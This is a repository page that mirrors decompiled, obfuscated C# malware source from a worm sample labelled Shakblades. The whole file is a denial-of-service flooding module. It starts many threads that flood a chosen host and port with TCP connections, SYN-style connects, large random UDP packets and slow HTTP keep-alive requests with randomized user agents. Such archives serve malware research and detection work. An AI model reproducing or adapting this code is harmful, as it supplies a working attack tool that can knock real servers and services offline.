ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/Ј໺঳ᝮᢶᯀ.cs

298 lines
13 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.Ј໺঳ᝮᢶᯀ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System;
using System.Net.Sockets;
using System.Text;
using System.Threading;
namespace Ҧ߲ʽ
{
internal class Ј\u0EFA\u09B3ᝮᢶᯀ
{
private static Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C Ç\u09F5ࠍ\u0082;
private static bool \u1AA0;
private static string ɀ\u0F30;
private static int \u0EEBΝᝧԠ;
private static int \u1087;
private static int ɱ\u1A8Aᙦ;
private static int \u0027;
private static \u07F6\u181Fᒸৃ ;
private static string[] \u0942 = new string[28]
{
"[W5aioKOUp5yVn5huU4CGfHgznRO9U2lhY25Tipyhl6KqplOBh1w=]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==]",
"[OV6Ac3p9dmF5gH92MWRUYT5GRkFBQGZkQEI/QToxX3aFV4OAf4VARD9BMV5eYUBDP0ExOXSAfhE/sm2BcoV6c312TDFYgIB4fXZzgIVAQz9CTDF5hYWBS0BAiIiIP3iAgHh9dj90gH5Ac4CFP3mFfn06]",
"[bHZ/bjE5aBE/sm16f19lTDFmOg==]",
"[OXSAfoFyhXpzfXZMMV5kWlYxSD9BTBE/sm0xaHp/dYCIhDFfZTFGP0JMMXN4d4U6MQ==]",
"[OXSAfoFyhXpzfXZMMV4RP7JtZFpWMUc/QUwxaHp/REM6]",
"[OWlCQkwxZkwxXXp/hokxQz9FP0M+QzF6RklHTDF2fz5mZEwRP7JtMX5CSToxWHZ0fIBAQ0FBQkFCREIxX3aFhHRygXZHQEc/QUI=]",
"[OWlCQkwxZkwxXXp/hokxekdJR0wxdn8+ZmQRP7JtTDGDh0tBP0o/RDoxWHZ0fIBAQ0FBQkFJQUI=]",
"[OWSGf2BkMUY/STGEhn9FhkwRP7JtMWY6MWCBdoNyMUY/QTFsdn9u]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo0]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo1]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo2]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo3]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo4]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo5]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo6]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo7]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo8]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo9]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==0]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==1]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==2]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==3]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==4]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==5]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==6]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==7]"
};
private static string[] \u0669ѹᏲբ݅ = new string[10]
{
"[udvm1djYbAzPpc2bn5qcjA==]",
"[udvm1djYbAzPpc2bn5qdjA==]",
"[udvm1djYbAzPpc2bn5qijA==]",
"[JUdSQURE2DvBDTkHDAYI+A==]",
"[JUdSQURE2DvBDTkHDAYIEPg=]",
"[JUdSQURE2DvBDTkHDQYI+A==]",
"[J0g9SjnYO8ENBxEGCwv4]",
"[J0g9SjnYO8ENBxEGCPg=]",
"[J0g9SjnYO8ENBxAGEQj4]",
"[J0g9SjnYO8ENBxEGEAj4]"
};
public static Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C \u083A\u0606ᓙ\u0F03 => Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082;
public static string \u0E4BᡐḼ
{
get
{
switch (Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082)
{
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0307جᢦ౯᥏\u0DB2:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("Eb314QAADQ==", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0E86ᐪᬞ\u0F0Dਞ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("[SYN]", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0C8D\u0AC6ᩬ\u1A5Fᔅ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("Er314QABDQ==", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.ľ\u1C99\u1B67șՔᘱ݆ߜ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("ECksNL314QApLC8mMA==", true);
default:
return (string) null;
}
}
}
public static bool ͕IJ\u0ADFধ => Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0;
public static void ޚ\u1A8E\u1361\u0B12\u007F\u05EB(
Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C _param0,
string _param1,
int _param2,
int _param3,
int _param4,
int _param5,
\u07F6\u181Fᒸৃ _param6)
{
Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082 = _param0;
Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30 = _param1;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ = _param2;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087 = _param3;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 = _param4;
Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ = _param5;
Ј\u0EFA\u09B3ᝮᢶᯀ. = _param6;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = false;
}
public static void ŝʊ()
{
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = true;
new Thread(new ThreadStart(Ј\u0EFA\u09B3ᝮᢶᯀ.șȓ)).Start();
}
public static void ϊ() => Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = false;
private static void șȓ()
{
for (int index = 0; index < Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087; ++index)
{
try
{
new Thread(new ThreadStart(Ј\u0EFA\u09B3ᝮᢶᯀ.\u16FA))
{
IsBackground = true
}.Start();
}
catch (OutOfMemoryException ex)
{
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087 = index - 1;
break;
}
}
}
private static void \u16FA()
{
int num = 0;
while (Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 && Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
switch (Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082)
{
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0307جᢦ౯᥏\u0DB2:
Socket socket1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket1.Blocking = false;
while (num < Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 && Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
try
{
socket1.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
socket1.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0097\u0E00ᰬអᙲ\u0CFE੮ᆳଅ());
socket1.Close();
socket1 = (Socket) null;
}
catch
{
socket1.Close();
break;
}
++num;
Thread.Sleep(1);
}
else
break;
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0E86ᐪᬞ\u0F0Dਞ:
Socket socket2 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket2.Blocking = false;
try
{
socket2.BeginConnect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ, new AsyncCallback(Ј\u0EFA\u09B3ᝮᢶᯀ.\u1759ໞ\u060Fᣊ\u1B5B), (object) null);
}
catch
{
}
Thread.Sleep(100);
try
{
if (socket2.Connected)
socket2.Disconnect(false);
socket2.Close();
}
catch
{
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0C8D\u0AC6ᩬ\u1A5Fᔅ:
Socket socket3 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
socket3.Blocking = false;
Socket socket4;
try
{
socket3.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
while (num < Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 && Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 && Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
socket3.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0738Зܫ\u0837ᚖųᮝ());
++num;
Thread.Sleep(1);
}
socket3.Close();
socket4 = (Socket) null;
}
catch
{
socket3.Close();
socket4 = (Socket) null;
break;
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.ľ\u1C99\u1B67șՔᘱ݆ߜ:
Socket socket5 = (Socket) null;
try
{
socket5 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket5.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
socket5.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0826Ꮽ\u0B72\u1AC1ଲ());
while (socket5.Connected)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
socket5.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0826Ꮽ\u0B72\u1AC1ଲ());
Thread.Sleep(2000);
}
else
break;
}
else
break;
}
}
catch
{
socket5.Close();
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
}
num = 0;
}
if (!Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
return;
Ј\u0EFA\u09B3ᝮᢶᯀ.ϊ();
}
private static void \u1759ໞ\u060Fᣊ\u1B5B(IAsyncResult _param0)
{
}
private static byte[] \u0738Зܫ\u0837ᚖųᮝ()
{
Random random = new Random();
byte[] buffer = new byte[random.Next(1470, 65507)];
random.NextBytes(buffer);
return buffer;
}
private static byte[] \u0097\u0E00ᰬអᙲ\u0CFE੮ᆳଅ()
{
Random random = new Random();
byte[] buffer = new byte[random.Next(1470, (int) ushort.MaxValue)];
random.NextBytes(buffer);
return buffer;
}
private static byte[] \u0826Ꮽ\u0B72\u1AC1ଲ()
{
Random random = new Random();
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.AppendLine("GET / HTTP/1.1");
stringBuilder.AppendLine("Host: " + Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30);
stringBuilder.AppendLine("User-Agent: " + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0669ѹᏲբ݅[random.Next(0, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0669ѹᏲբ݅.Length - 1)], true) + " " + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0942[random.Next(0, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0942.Length - 1)], true));
stringBuilder.AppendLine("Content-Length: " + random.Next(1, 1000).ToString());
stringBuilder.AppendLine("X-a: " + random.Next(1, 10000).ToString());
stringBuilder.Append("Connection: keep-alive");
return Encoding.ASCII.GetBytes(stringBuilder.ToString());
}
public enum ք\u0609ǟ\u175C
{
\u0307جᢦ౯᥏\u0DB2,
\u0E86ᐪᬞ\u0F0Dਞ,
\u0C8D\u0AC6ᩬ\u1A5Fᔅ,
ľ\u1C99\u1B67șՔᘱ݆ߜ,
}
}
}
Reference in New Issue Copy Permalink